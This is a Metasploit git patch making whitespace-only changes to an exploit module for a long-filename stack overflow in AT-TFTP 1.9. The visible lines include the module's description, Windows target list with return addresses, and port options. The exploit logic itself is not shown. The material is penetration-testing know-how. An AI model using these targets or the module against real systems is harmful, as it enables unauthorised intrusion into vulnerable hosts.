From be158fbcb3d73d61e8762e70556c00a9aa549c06 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Mon, 24 May 2010 14:56:49 +0000 Subject: [PATCH] whitespace tweaks git-svn-id: file:///home/svn/framework3/trunk@9352 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/tftp/attftp_long_filename.rb | 29 +++++++++---------- 1 file changed, 13 insertions(+), 16 deletions(-) diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index f3da5688b4..82a7c59b7d 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a + This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name. }, - 'Author' => [ 'Patrick Webster ' ], + 'Author' => [ 'Patrick Webster ' ], 'Version' => '$Revision$', 'References' => [ @@ -50,22 +48,22 @@ class Metasploit3 < Msf::Exploit::Remote [ # Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24 [ 'Windows NT SP4 English', { 'Ret' => 0x702ea6f7 } ], - [ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ], - [ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ], - [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ], - [ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ], - [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], - [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], + [ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ], + [ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ], + [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ], + [ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ], + [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], + [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 27 2006')) - register_options( - [ - Opt::RPORT(69), - Opt::LHOST() # Required for stack offset - ], self.class) + register_options( + [ + Opt::RPORT(69), + Opt::LHOST() # Required for stack offset + ], self.class) end def exploit @@ -83,4 +81,3 @@ class Metasploit3 < Msf::Exploit::Remote end end -